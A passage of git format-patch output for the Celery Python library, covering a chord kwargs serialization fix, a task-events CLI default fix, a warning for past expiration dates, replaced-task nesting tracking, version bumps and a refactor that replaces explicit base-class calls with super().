- kwargs = kwargs if kwargs else {}
+ kwargs = kwargs if kwargs else {'kwargs': {}}
Signature.__init__(
self, task, args,
- {'kwargs': kwargs, 'header': _maybe_group(header, app),
+ {**kwargs, 'header': _maybe_group(header, app),
'body': maybe_signature(body, app=app)}, app=app, **options
)
self.subtask_type = 'chord'
diff --git a/t/unit/tasks/test_chord.py b/t/unit/tasks/test_chord.py
index d977418c1bc..af4fdee4627 100644
--- a/t/unit/tasks/test_chord.py
+++ b/t/unit/tasks/test_chord.py
@@ -279,6 +279,24 @@ def test_apply(self):
finally:
chord.run = prev
+ def test_init(self):
+ from celery import chord
+ from celery.utils.serialization import pickle
+
+ @self.app.task(shared=False)
+ def addX(x, y):
+ return x + y
+
+ @self.app.task(shared=False)
+ def sumX(n):
+ return sum(n)
+
+ x = chord(addX.s(i, i) for i in range(10))
+ # kwargs used to nest and recurse in serialization/deserialization
+ # (#6810)
+ assert x.kwargs['kwargs'] == {}
+ assert pickle.loads(pickle.dumps(x)).kwargs == x.kwargs
+
class test_add_to_chord:
From 47118fbf236a8c1bff7136ef47a797e233593d84 Mon Sep 17 00:00:00 2001
From: Alejandro Solda <43531535+alesolda@users.noreply.github.com>
Date: Mon, 20 Sep 2021 14:48:20 -0300
Subject: [PATCH 076/177] Allow to enable Events with app.conf mechanism
--task-events is defined as a Click Boolean Flag, without an off-switch
and False as the implicit default value, so when this parameter
is omitted in CLI invocation, Click will set it to False. Because
the aforementioned, *Events* only can be enabled via CLI (values in
app.conf.worker_send_task_events will be ignored).
Current behaviour:
1. click.option decorator for --task-events sets task_events flag
to False
2. "either" function (with arguments worker_send_task_events,
task_events) resolves to the first non-None value (in our case False)
ignoring values from app.conf
This fix changes --task-events default value from implicit "False"
to explicit "None", allowing "either" method to correctly resolve
in favor of app.conf.worker_send_task_events value when set.
Fixes: #6910
---
celery/bin/worker.py | 1 +
1 file changed, 1 insertion(+)
diff --git a/celery/bin/worker.py b/celery/bin/worker.py
index 68a0d117247..7e0d3247ab5 100644
--- a/celery/bin/worker.py
+++ b/celery/bin/worker.py
@@ -206,6 +206,7 @@ def detach(path, argv, logfile=None, pidfile=None, uid=None,
'--task-events',
'--events',
is_flag=True,
+ default=None,
cls=CeleryOption,
help_group="Pool Options",
help="Send task-related events that can be captured by monitors"
From 7227d4b36abcbe0f593c8aa308db15dd8f2039ba Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Mon, 20 Sep 2021 19:58:24 +0300
Subject: [PATCH 077/177] Warn when expiration date is in the past.
---
celery/app/base.py | 11 +++++++++++
1 file changed, 11 insertions(+)
diff --git a/celery/app/base.py b/celery/app/base.py
index 5d072bb109e..a00d4651336 100644
--- a/celery/app/base.py
+++ b/celery/app/base.py
@@ -739,6 +739,17 @@ def send_task(self, name, args=None, kwargs=None, countdown=None,
expires_s = expires
if expires_s < 0:
+ logger.warning(
+ f"{task_id} has an expiration date in the past ({-expires_s}s ago).\n"
+ "We assume this is intended and so we have set the "
+ "expiration date to 0 instead.\n"
+ "According to RabbitMQ's documentation:\n"
+ "\"Setting the TTL to 0 causes messages to be expired upon "
+ "reaching a queue unless they can be delivered to a "
+ "consumer immediately.\"\n"
+ "If this was unintended, please check the code which "
+ "published this task."
+ )
expires_s = 0
options["expiration"] = expires_s
From c87eea4ef5a41fe140bb4aacd4f20301066e66fd Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Thu, 23 Sep 2021 15:53:55 +0300
Subject: [PATCH 078/177] Add the Framework :: Celery trove classifier.
I've managed to add it to the official list.
See https://github.com/pypa/trove-classifiers/pull/75.
---
setup.py | 1 +
1 file changed, 1 insertion(+)
diff --git a/setup.py b/setup.py
index f81e2404f36..f3a211a3356 100644
--- a/setup.py
+++ b/setup.py
@@ -185,6 +185,7 @@ def run_tests(self):
"License :: OSI Approved :: BSD License",
"Topic :: System :: Distributed Computing",
"Topic :: Software Development :: Object Brokering",
+ "Framework :: Celery",
"Programming Language :: Python",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3",
From 5b698151d5e8da10f6706df42fb99fb3105ac025 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Thu, 23 Sep 2021 16:22:50 +0300
Subject: [PATCH 079/177] Give indication whether the task is replacing another
(#6916)
* Give indication whether the task is replacing another.
We now increase the replaced_task_nesting option each time
we replace a task.
* Added basic documentation.
---
celery/app/task.py | 4 ++++
celery/worker/request.py | 4 ++++
docs/internals/protocol.rst | 1 +
docs/userguide/tasks.rst | 5 ++++-
t/unit/tasks/test_canvas.py | 2 +-
t/unit/tasks/test_tasks.py | 5 +++++
6 files changed, 19 insertions(+), 2 deletions(-)
diff --git a/celery/app/task.py b/celery/app/task.py
index e58b5b8ade5..9a6796e6bb3 100644
--- a/celery/app/task.py
+++ b/celery/app/task.py
@@ -88,6 +88,7 @@ class Context:
properties = None
retries = 0
reply_to = None
+ replaced_task_nesting = 0
root_id = None
shadow = None
taskset = None # compat alias to group
@@ -128,6 +129,7 @@ def as_execution_options(self):
'headers': self.headers,
'retries': self.retries,
'reply_to': self.reply_to,
+ 'replaced_task_nesting': self.replaced_task_nesting,
'origin': self.origin,
}
@@ -916,11 +918,13 @@ def replace(self, sig):
# which would break previously constructed results objects.
sig.freeze(self.request.id)
# Ensure the important options from the original signature are retained
+ replaced_task_nesting = self.request.get('replaced_task_nesting', 0) + 1
sig.set(
chord=chord,
group_id=self.request.group,
group_index=self.request.group_index,
root_id=self.request.root_id,
+ replaced_task_nesting=replaced_task_nesting
)
# If the task being replaced is part of a chain, we need to re-create
# it with the replacement signature - these subsequent tasks will
diff --git a/celery/worker/request.py b/celery/worker/request.py
index 59bf143feac..0b29bde65bb 100644
--- a/celery/worker/request.py
+++ b/celery/worker/request.py
@@ -311,6 +311,10 @@ def reply_to(self):
# used by rpc backend when failures reported by parent process
return self._request_dict['reply_to']
+ @property
+ def replaced_task_nesting(self):
+ return self._request_dict.get('replaced_task_nesting', 0)
+
@property
def correlation_id(self):
# used similarly to reply_to
diff --git a/docs/internals/protocol.rst b/docs/internals/protocol.rst
index ce4794be83d..72f461dc936 100644
--- a/docs/internals/protocol.rst
+++ b/docs/internals/protocol.rst
@@ -49,6 +49,7 @@ Definition
'argsrepr': str repr(args),
'kwargsrepr': str repr(kwargs),
'origin': str nodename,
+ 'replaced_task_nesting': int
}
body = (
diff --git a/docs/userguide/tasks.rst b/docs/userguide/tasks.rst
index eeb31d3ed21..49c4dd68337 100644
--- a/docs/userguide/tasks.rst
+++ b/docs/userguide/tasks.rst
@@ -67,7 +67,7 @@ consider enabling the :setting:`task_reject_on_worker_lost` setting.
In previous versions, the default prefork pool scheduler was not friendly
to long-running tasks, so if you had tasks that ran for minutes/hours, it
was advised to enable the :option:`-Ofair ` command-line
- argument to the :program:`celery worker`. However, as of version 4.0,
+ argument to the :program:`celery worker`. However, as of version 4.0,
-Ofair is now the default scheduling strategy. See :ref:`optimizing-prefetch-limit`
for more information, and for the best performance route long-running and
short-running tasks to dedicated workers (:ref:`routing-automatic`).
@@ -377,6 +377,9 @@ The request defines the following attributes:
:properties: Mapping of message properties received with this task message
(may be :const:`None` or :const:`{}`)
+:replaced_task_nesting: How many times the task was replaced, if at all.
+ (may be :const:`0`)
+
Example
-------
diff --git a/t/unit/tasks/test_canvas.py b/t/unit/tasks/test_canvas.py
index 575861cc29e..f3f4c448fe0 100644
--- a/t/unit/tasks/test_canvas.py
+++ b/t/unit/tasks/test_canvas.py
@@ -91,7 +91,7 @@ def test_reduce(self):
assert fun(*args) == x
def test_replace(self):
- x = Signature('TASK', ('A'), {})
+ x = Signature('TASK', ('A',), {})
assert x.replace(args=('B',)).args == ('B',)
assert x.replace(kwargs={'FOO': 'BAR'}).kwargs == {
'FOO': 'BAR',
diff --git a/t/unit/tasks/test_tasks.py b/t/unit/tasks/test_tasks.py
index 4beeaf967d0..f5b4af87003 100644
--- a/t/unit/tasks/test_tasks.py
+++ b/t/unit/tasks/test_tasks.py
@@ -1020,6 +1020,11 @@ def test_replace(self):
with pytest.raises(Ignore):
self.mytask.replace(sig1)
sig1.freeze.assert_called_once_with(self.mytask.request.id)
+ sig1.set.assert_called_once_with(replaced_task_nesting=1,
+ chord=ANY,
+ group_id=ANY,
+ group_index=ANY,
+ root_id=ANY)
def test_replace_with_chord(self):
sig1 = Mock(name='sig1')
From e68e844f93a7ac836bd60a0a8f89b570ecd8d483 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Thu, 23 Sep 2021 16:25:22 +0300
Subject: [PATCH 080/177] Make setup.py executable.
---
setup.py | 0
1 file changed, 0 insertions(+), 0 deletions(-)
mode change 100644 => 100755 setup.py
diff --git a/setup.py b/setup.py
old mode 100644
new mode 100755
From a2e45c995d52eae0b144db83d83f403dbe7b0547 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Thu, 23 Sep 2021 16:25:59 +0300
Subject: [PATCH 081/177] =?UTF-8?q?Bump=20version:=205.2.0b3=20=E2=86=92?=
=?UTF-8?q?=205.2.0rc1?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.bumpversion.cfg | 2 +-
README.rst | 6 +++---
celery/__init__.py | 2 +-
docs/includes/introduction.txt | 2 +-
4 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/.bumpversion.cfg b/.bumpversion.cfg
index cf0e85fec33..e15f3d1d528 100644
--- a/.bumpversion.cfg
+++ b/.bumpversion.cfg
@@ -1,5 +1,5 @@
[bumpversion]
-current_version = 5.2.0b3
+current_version = 5.2.0rc1
commit = True
tag = True
parse = (?P\d+)\.(?P\d+)\.(?P\d+)(?P[a-z\d]+)?
diff --git a/README.rst b/README.rst
index 9a6b2335717..a2ae072e6fd 100644
--- a/README.rst
+++ b/README.rst
@@ -2,7 +2,7 @@
|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge|
-:Version: 5.2.0b3 (dawn-chorus)
+:Version: 5.2.0rc1 (dawn-chorus)
:Web: https://docs.celeryproject.org/en/stable/index.html
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
@@ -57,7 +57,7 @@ in such a way that the client enqueues an URL to be requested by a worker.
What do I need?
===============
-Celery version 5.2.0b3 runs on,
+Celery version 5.2.0rc1 runs on,
- Python (3.7, 3.8, 3.9)
- PyPy3.7 (7.3+)
@@ -90,7 +90,7 @@ Get Started
===========
If this is the first time you're trying to use Celery, or you're
-new to Celery 5.0.5 or 5.2.0b3 coming from previous versions then you should read our
+new to Celery 5.0.5 or 5.2.0rc1 coming from previous versions then you should read our
getting started tutorials:
- `First steps with Celery`_
diff --git a/celery/__init__.py b/celery/__init__.py
index 3fdffce06ca..3757c43a725 100644
--- a/celery/__init__.py
+++ b/celery/__init__.py
@@ -17,7 +17,7 @@
SERIES = 'dawn-chorus'
-__version__ = '5.2.0b3'
+__version__ = '5.2.0rc1'
__author__ = 'Ask Solem'
__contact__ = 'auvipy@gmail.com'
__homepage__ = 'http://celeryproject.org'
diff --git a/docs/includes/introduction.txt b/docs/includes/introduction.txt
index 48c25ce0f07..7b40123da0a 100644
--- a/docs/includes/introduction.txt
+++ b/docs/includes/introduction.txt
@@ -1,4 +1,4 @@
-:Version: 5.2.0b3 (cliffs)
+:Version: 5.2.0rc1 (cliffs)
:Web: http://celeryproject.org/
:Download: https://pypi.org/project/celery/
:Source: https://github.com/celery/celery/
From f915f111b3c218a629d021a982adcc6658c87d50 Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Sun, 26 Sep 2021 15:47:27 +0300
Subject: [PATCH 082/177] Bump Python 3.10.0 to rc2.
---
.github/workflows/python-package.yml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/.github/workflows/python-package.yml b/.github/workflows/python-package.yml
index a47283da6ac..4136c4eff62 100644
--- a/.github/workflows/python-package.yml
+++ b/.github/workflows/python-package.yml
@@ -24,7 +24,7 @@ jobs:
strategy:
fail-fast: false
matrix:
- python-version: ['3.7', '3.8', '3.9', '3.10.0-rc.1', 'pypy-3.7']
+ python-version: ['3.7', '3.8', '3.9', '3.10.0-rc.2', 'pypy-3.7']
os: ["ubuntu-20.04", "windows-2019"]
steps:
From fb62bc8732b79af558fbf3d1ae903dcd4f5fd2f3 Mon Sep 17 00:00:00 2001
From: "pre-commit-ci[bot]"
<66853113+pre-commit-ci[bot]@users.noreply.github.com>
Date: Mon, 27 Sep 2021 21:32:18 +0300
Subject: [PATCH 083/177] [pre-commit.ci] pre-commit autoupdate (#6972)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
* [pre-commit.ci] pre-commit autoupdate
updates:
- [github.com/asottile/pyupgrade: v2.26.0 → v2.28.0](https://github.com/asottile/pyupgrade/compare/v2.26.0...v2.28.0)
* [pre-commit.ci] auto fixes from pre-commit.com hooks
for more information, see https://pre-commit.ci
Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
---
.pre-commit-config.yaml | 2 +-
celery/app/amqp.py | 6 +++---
celery/app/log.py | 2 +-
celery/apps/worker.py | 2 +-
celery/backends/elasticsearch.py | 12 ++++++------
celery/beat.py | 2 +-
celery/canvas.py | 21 ++++++++-------------
celery/contrib/rdb.py | 2 +-
celery/events/cursesmon.py | 2 +-
celery/result.py | 4 ++--
celery/security/certificate.py | 2 +-
celery/utils/log.py | 8 ++++----
celery/utils/serialization.py | 2 +-
celery/utils/time.py | 2 +-
celery/utils/timer2.py | 2 +-
setup.py | 2 +-
t/unit/app/test_beat.py | 4 ++--
t/unit/app/test_builtins.py | 6 +++---
t/unit/app/test_log.py | 2 +-
t/unit/backends/test_base.py | 2 +-
t/unit/utils/test_pickle.py | 2 +-
t/unit/utils/test_saferepr.py | 10 +++++-----
t/unit/worker/test_request.py | 2 +-
t/unit/worker/test_strategy.py | 2 +-
24 files changed, 49 insertions(+), 54 deletions(-)
diff --git a/.pre-commit-config.yaml b/.pre-commit-config.yaml
index d6a815ae694..83eaf953100 100644
--- a/.pre-commit-config.yaml
+++ b/.pre-commit-config.yaml
@@ -1,6 +1,6 @@
repos:
- repo: https://github.com/asottile/pyupgrade
- rev: v2.26.0
+ rev: v2.28.0
hooks:
- id: pyupgrade
args: ["--py37-plus"]
diff --git a/celery/app/amqp.py b/celery/app/amqp.py
index 12a511d75fd..10747eed93b 100644
--- a/celery/app/amqp.py
+++ b/celery/app/amqp.py
@@ -56,7 +56,7 @@ class Queues(dict):
def __init__(self, queues=None, default_exchange=None,
create_missing=True, autoexchange=None,
max_priority=None, default_routing_key=None):
- dict.__init__(self)
+ super().__init__()
self.aliases = WeakValueDictionary()
self.default_exchange = default_exchange
self.default_routing_key = default_routing_key
@@ -73,12 +73,12 @@ def __getitem__(self, name):
try:
return self.aliases[name]
except KeyError:
- return dict.__getitem__(self, name)
+ return super().__getitem__(name)
def __setitem__(self, name, queue):
if self.default_exchange and not queue.exchange:
queue.exchange = self.default_exchange
- dict.__setitem__(self, name, queue)
+ super().__setitem__(name, queue)
if queue.alias:
self.aliases[queue.alias] = queue
diff --git a/celery/app/log.py b/celery/app/log.py
index 01b45aa4ae1..4ca9bc7ccd1 100644
--- a/celery/app/log.py
+++ b/celery/app/log.py
@@ -41,7 +41,7 @@ def format(self, record):
else:
record.__dict__.setdefault('task_name', '???')
record.__dict__.setdefault('task_id', '???')
- return ColorFormatter.format(self, record)
+ return super().format(record)
class Logging:
diff --git a/celery/apps/worker.py b/celery/apps/worker.py
index c220857eb3a..8f774ae3858 100644
--- a/celery/apps/worker.py
+++ b/celery/apps/worker.py
@@ -121,7 +121,7 @@ def on_init_blueprint(self):
def on_start(self):
app = self.app
- WorkController.on_start(self)
+ super().on_start()
# this signal can be used to, for example, change queues after
# the -Q option has been applied.
diff --git a/celery/backends/elasticsearch.py b/celery/backends/elasticsearch.py
index 42e93b23d53..c40b15ddec8 100644
--- a/celery/backends/elasticsearch.py
+++ b/celery/backends/elasticsearch.py
@@ -199,10 +199,10 @@ def _update(self, id, body, state, **kwargs):
def encode(self, data):
if self.es_save_meta_as_text:
- return KeyValueStoreBackend.encode(self, data)
+ return super().encode(data)
else:
if not isinstance(data, dict):
- return KeyValueStoreBackend.encode(self, data)
+ return super().encode(data)
if data.get("result"):
data["result"] = self._encode(data["result"])[2]
if data.get("traceback"):
@@ -211,14 +211,14 @@ def encode(self, data):
def decode(self, payload):
if self.es_save_meta_as_text:
- return KeyValueStoreBackend.decode(self, payload)
+ return super().decode(payload)
else:
if not isinstance(payload, dict):
- return KeyValueStoreBackend.decode(self, payload)
+ return super().decode(payload)
if payload.get("result"):
- payload["result"] = KeyValueStoreBackend.decode(self, payload["result"])
+ payload["result"] = super().decode(payload["result"])
if payload.get("traceback"):
- payload["traceback"] = KeyValueStoreBackend.decode(self, payload["traceback"])
+ payload["traceback"] = super().decode(payload["traceback"])
return payload
def mget(self, keys):
diff --git a/celery/beat.py b/celery/beat.py
index 7f72f2f2fec..d8a4fc9e8b2 100644
--- a/celery/beat.py
+++ b/celery/beat.py
@@ -512,7 +512,7 @@ class PersistentScheduler(Scheduler):
def __init__(self, *args, **kwargs):
self.schedule_filename = kwargs.get('schedule_filename')
- Scheduler.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
def _remove_db(self):
for suffix in self.known_suffixes:
diff --git a/celery/canvas.py b/celery/canvas.py
index f3a8efce1d5..18eece20ef8 100644
--- a/celery/canvas.py
+++ b/celery/canvas.py
@@ -485,7 +485,7 @@ def __repr__(self):
return self.reprcall()
def items(self):
- for k, v in dict.items(self):
+ for k, v in super().items():
yield k.decode() if isinstance(k, bytes) else k, v
@property
@@ -600,8 +600,7 @@ def from_dict(cls, d, app=None):
def __init__(self, *tasks, **options):
tasks = (regen(tasks[0]) if len(tasks) == 1 and is_list(tasks[0])
else tasks)
- Signature.__init__(
- self, 'celery.chain', (), {'tasks': tasks}, **options
+ super().__init__('celery.chain', (), {'tasks': tasks}, **options
)
self._use_link = options.pop('use_link', None)
self.subtask_type = 'chain'
@@ -613,7 +612,7 @@ def __call__(self, *args, **kwargs):
def clone(self, *args, **kwargs):
to_signature = maybe_signature
- signature = Signature.clone(self, *args, **kwargs)
+ signature = super().clone(*args, **kwargs)
signature.kwargs['tasks'] = [
to_signature(sig, app=self._app, clone=True)
for sig in signature.kwargs['tasks']
@@ -903,8 +902,7 @@ def from_dict(cls, d, app=None):
return cls(*cls._unpack_args(d['kwargs']), app=app, **d['options'])
def __init__(self, task, it, **options):
- Signature.__init__(
- self, self._task_name, (),
+ super().__init__(self._task_name, (),
{'task': task, 'it': regen(it)}, immutable=True, **options
)
@@ -957,8 +955,7 @@ def from_dict(cls, d, app=None):
return chunks(*cls._unpack_args(d['kwargs']), app=app, **d['options'])
def __init__(self, task, it, n, **options):
- Signature.__init__(
- self, 'celery.chunks', (),
+ super().__init__('celery.chunks', (),
{'task': task, 'it': regen(it), 'n': n},
immutable=True, **options
)
@@ -1056,8 +1053,7 @@ def __init__(self, *tasks, **options):
tasks = [tasks.clone()]
if not isinstance(tasks, _regen):
tasks = regen(tasks)
- Signature.__init__(
- self, 'celery.group', (), {'tasks': tasks}, **options
+ super().__init__('celery.group', (), {'tasks': tasks}, **options
)
self.subtask_type = 'group'
@@ -1353,8 +1349,7 @@ def __init__(self, header, body=None, task='celery.chord',
args=None, kwargs=None, app=None, **options):
args = args if args else ()
kwargs = kwargs if kwargs else {'kwargs': {}}
- Signature.__init__(
- self, task, args,
+ super().__init__(task, args,
{**kwargs, 'header': _maybe_group(header, app),
'body': maybe_signature(body, app=app)}, app=app, **options
)
@@ -1500,7 +1495,7 @@ def run(self, header, body, partial_args, app=None, interval=None,
return bodyres
def clone(self, *args, **kwargs):
- signature = Signature.clone(self, *args, **kwargs)
+ signature = super().clone(*args, **kwargs)
# need to make copy of body
try:
signature.kwargs['body'] = maybe_signature(
diff --git a/celery/contrib/rdb.py b/celery/contrib/rdb.py
index 6d346a0d36f..995bec16d19 100644
--- a/celery/contrib/rdb.py
+++ b/celery/contrib/rdb.py
@@ -110,7 +110,7 @@ def __init__(self, host=CELERY_RDB_HOST, port=CELERY_RDB_PORT,
self.remote_addr = ':'.join(str(v) for v in address)
self.say(SESSION_STARTED.format(self=self))
self._handle = sys.stdin = sys.stdout = self._client.makefile('rw')
- Pdb.__init__(self, completekey='tab',
+ super().__init__(completekey='tab',
stdin=self._handle, stdout=self._handle)
def get_avail_port(self, host, port, search_limit=100, skew=+0):
diff --git a/celery/events/cursesmon.py b/celery/events/cursesmon.py
index e9534a7a554..677c5e7556a 100644
--- a/celery/events/cursesmon.py
+++ b/celery/events/cursesmon.py
@@ -483,7 +483,7 @@ class DisplayThread(threading.Thread): # pragma: no cover
def __init__(self, display):
self.display = display
self.shutdown = False
- threading.Thread.__init__(self)
+ super().__init__()
def run(self):
while not self.shutdown:
diff --git a/celery/result.py b/celery/result.py
index 5ed08e3886c..2a78484502e 100644
--- a/celery/result.py
+++ b/celery/result.py
@@ -884,11 +884,11 @@ class GroupResult(ResultSet):
def __init__(self, id=None, results=None, parent=None, **kwargs):
self.id = id
self.parent = parent
- ResultSet.__init__(self, results, **kwargs)
+ super().__init__(results, **kwargs)
def _on_ready(self):
self.backend.remove_pending_result(self)
- ResultSet._on_ready(self)
+ super()._on_ready()
def save(self, backend=None):
"""Save group-result for later retrieval using :meth:`restore`.
diff --git a/celery/security/certificate.py b/celery/security/certificate.py
index 0f3fd8680f7..0c31bb79f31 100644
--- a/celery/security/certificate.py
+++ b/celery/security/certificate.py
@@ -85,7 +85,7 @@ class FSCertStore(CertStore):
"""File system certificate store."""
def __init__(self, path):
- CertStore.__init__(self)
+ super().__init__()
if os.path.isdir(path):
path = os.path.join(path, '*')
for p in glob.glob(path):
diff --git a/celery/utils/log.py b/celery/utils/log.py
index 48a2bc40897..6fca1226768 100644
--- a/celery/utils/log.py
+++ b/celery/utils/log.py
@@ -133,17 +133,17 @@ class ColorFormatter(logging.Formatter):
}
def __init__(self, fmt=None, use_color=True):
- logging.Formatter.__init__(self, fmt)
+ super().__init__(fmt)
self.use_color = use_color
def formatException(self, ei):
if ei and not isinstance(ei, tuple):
ei = sys.exc_info()
- r = logging.Formatter.formatException(self, ei)
+ r = super().formatException(ei)
return r
def format(self, record):
- msg = logging.Formatter.format(self, record)
+ msg = super().format(record)
color = self.colors.get(record.levelname)
# reset exception info later for other handlers...
@@ -168,7 +168,7 @@ def format(self, record):
),
)
try:
- return logging.Formatter.format(self, record)
+ return super().format(record)
finally:
record.msg, record.exc_info = prev_msg, einfo
else:
diff --git a/celery/utils/serialization.py b/celery/utils/serialization.py
index dc3815e1f7b..673fdf50913 100644
--- a/celery/utils/serialization.py
+++ b/celery/utils/serialization.py
@@ -133,7 +133,7 @@ def __init__(self, exc_module, exc_cls_name, exc_args, text=None):
self.exc_cls_name = exc_cls_name
self.exc_args = safe_exc_args
self.text = text
- Exception.__init__(self, exc_module, exc_cls_name, safe_exc_args,
+ super().__init__(exc_module, exc_cls_name, safe_exc_args,
text)
def restore(self):
diff --git a/celery/utils/time.py b/celery/utils/time.py
index 55f7fce732c..c898b90e93a 100644
--- a/celery/utils/time.py
+++ b/celery/utils/time.py
@@ -66,7 +66,7 @@ def __init__(self):
else:
self.DSTOFFSET = self.STDOFFSET
self.DSTDIFF = self.DSTOFFSET - self.STDOFFSET
- tzinfo.__init__(self)
+ super().__init__()
def __repr__(self):
return f''
diff --git a/celery/utils/timer2.py b/celery/utils/timer2.py
index 82337257e4b..88d8ffd77ad 100644
--- a/celery/utils/timer2.py
+++ b/celery/utils/timer2.py
@@ -48,7 +48,7 @@ def __init__(self, schedule=None, on_error=None, on_tick=None,
max_interval=max_interval)
self.on_start = on_start
self.on_tick = on_tick or self.on_tick
- threading.Thread.__init__(self)
+ super().__init__()
# `_is_stopped` is likely to be an attribute on `Thread` objects so we
# double underscore these names to avoid shadowing anything and
# potentially getting confused by the superclass turning these into
diff --git a/setup.py b/setup.py
index f3a211a3356..fa3369b92be 100755
--- a/setup.py
+++ b/setup.py
@@ -139,7 +139,7 @@ class pytest(setuptools.command.test.test):
user_options = [('pytest-args=', 'a', 'Arguments to pass to pytest')]
def initialize_options(self):
- setuptools.command.test.test.initialize_options(self)
+ super().initialize_options()
self.pytest_args = []
def run_tests(self):
diff --git a/t/unit/app/test_beat.py b/t/unit/app/test_beat.py
index 2434f6effb2..641c7b7a0b2 100644
--- a/t/unit/app/test_beat.py
+++ b/t/unit/app/test_beat.py
@@ -127,7 +127,7 @@ class mScheduler(beat.Scheduler):
def __init__(self, *args, **kwargs):
self.sent = []
- beat.Scheduler.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
def send_task(self, name=None, args=None, kwargs=None, **options):
self.sent.append({'name': name,
@@ -599,7 +599,7 @@ class MockPersistentScheduler(beat.PersistentScheduler):
def __init__(self, *args, **kwargs):
self.sent = []
- beat.PersistentScheduler.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
def send_task(self, task=None, args=None, kwargs=None, **options):
self.sent.append({'task': task,
diff --git a/t/unit/app/test_builtins.py b/t/unit/app/test_builtins.py
index b1d28690876..080999f7bc5 100644
--- a/t/unit/app/test_builtins.py
+++ b/t/unit/app/test_builtins.py
@@ -98,7 +98,7 @@ def setup(self):
)
self.app.conf.task_always_eager = True
self.task = builtins.add_group_task(self.app)
- BuiltinsCase.setup(self)
+ super().setup()
def test_apply_async_eager(self):
self.task.apply = Mock(name='apply')
@@ -133,7 +133,7 @@ def test_task__disable_add_to_parent(self, current_worker_task):
class test_chain(BuiltinsCase):
def setup(self):
- BuiltinsCase.setup(self)
+ super().setup()
self.task = builtins.add_chain_task(self.app)
def test_not_implemented(self):
@@ -145,7 +145,7 @@ class test_chord(BuiltinsCase):
def setup(self):
self.task = builtins.add_chord_task(self.app)
- BuiltinsCase.setup(self)
+ super().setup()
def test_apply_async(self):
x = chord([self.add.s(i, i) for i in range(10)], body=self.xsum.s())
diff --git a/t/unit/app/test_log.py b/t/unit/app/test_log.py
index cbe191f41d6..37ebe251f66 100644
--- a/t/unit/app/test_log.py
+++ b/t/unit/app/test_log.py
@@ -338,7 +338,7 @@ class MockLogger(logging.Logger):
def __init__(self, *args, **kwargs):
self._records = []
- logging.Logger.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
def handle(self, record):
self._records.append(record)
diff --git a/t/unit/backends/test_base.py b/t/unit/backends/test_base.py
index 9023dc14e57..3436053871d 100644
--- a/t/unit/backends/test_base.py
+++ b/t/unit/backends/test_base.py
@@ -342,7 +342,7 @@ def delete(self, key):
class DictBackend(BaseBackend):
def __init__(self, *args, **kwargs):
- BaseBackend.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
self._data = {'can-delete': {'result': 'foo'}}
def _restore_group(self, group_id):
diff --git a/t/unit/utils/test_pickle.py b/t/unit/utils/test_pickle.py
index 936300a3945..a915e9446f6 100644
--- a/t/unit/utils/test_pickle.py
+++ b/t/unit/utils/test_pickle.py
@@ -9,7 +9,7 @@ class ArgOverrideException(Exception):
def __init__(self, message, status_code=10):
self.status_code = status_code
- Exception.__init__(self, message, status_code)
+ super().__init__(message, status_code)
class test_Pickle:
diff --git a/t/unit/utils/test_saferepr.py b/t/unit/utils/test_saferepr.py
index e21fe25dbf7..68976f291ac 100644
--- a/t/unit/utils/test_saferepr.py
+++ b/t/unit/utils/test_saferepr.py
@@ -74,7 +74,7 @@ class list2(list):
class list3(list):
def __repr__(self):
- return list.__repr__(self)
+ return super().__repr__()
class tuple2(tuple):
@@ -84,7 +84,7 @@ class tuple2(tuple):
class tuple3(tuple):
def __repr__(self):
- return tuple.__repr__(self)
+ return super().__repr__()
class set2(set):
@@ -94,7 +94,7 @@ class set2(set):
class set3(set):
def __repr__(self):
- return set.__repr__(self)
+ return super().__repr__()
class frozenset2(frozenset):
@@ -104,7 +104,7 @@ class frozenset2(frozenset):
class frozenset3(frozenset):
def __repr__(self):
- return frozenset.__repr__(self)
+ return super().__repr__()
class dict2(dict):
@@ -114,7 +114,7 @@ class dict2(dict):
class dict3(dict):
def __repr__(self):
- return dict.__repr__(self)
+ return super().__repr__()
class test_saferepr:
diff --git a/t/unit/worker/test_request.py b/t/unit/worker/test_request.py
index 8e6e92d63ee..eb173a1c987 100644
--- a/t/unit/worker/test_request.py
+++ b/t/unit/worker/test_request.py
@@ -1142,7 +1142,7 @@ def setup(self):
self.task = Mock(name='task')
self.pool = Mock(name='pool')
self.eventer = Mock(name='eventer')
- RequestCase.setup(self)
+ super().setup()
def create_request_cls(self, **kwargs):
return create_request_cls(
diff --git a/t/unit/worker/test_strategy.py b/t/unit/worker/test_strategy.py
index 2e81fa0b7f9..8d7098954af 100644
--- a/t/unit/worker/test_strategy.py
+++ b/t/unit/worker/test_strategy.py
@@ -278,7 +278,7 @@ def test_custom_request_gets_instantiated(self):
class MyRequest(Request):
def __init__(self, *args, **kwargs):
- Request.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
_MyRequest()
class MyTask(Task):
From 71ed45d502a0dca67dce98a716e7c640d67e96ff Mon Sep 17 00:00:00 2001
From: Omer Katz
Date: Wed, 29 Sep 2021 13:01:23 +0300
Subject: [PATCH 084/177] autopep8.
---
celery/canvas.py | 20 ++++++++++----------
celery/contrib/rdb.py | 2 +-
celery/utils/serialization.py | 2 +-
3 files changed, 12 insertions(+), 12 deletions(-)
diff --git a/celery/canvas.py b/celery/canvas.py
index 18eece20ef8..8e9ac136f08 100644
--- a/celery/canvas.py
+++ b/celery/canvas.py
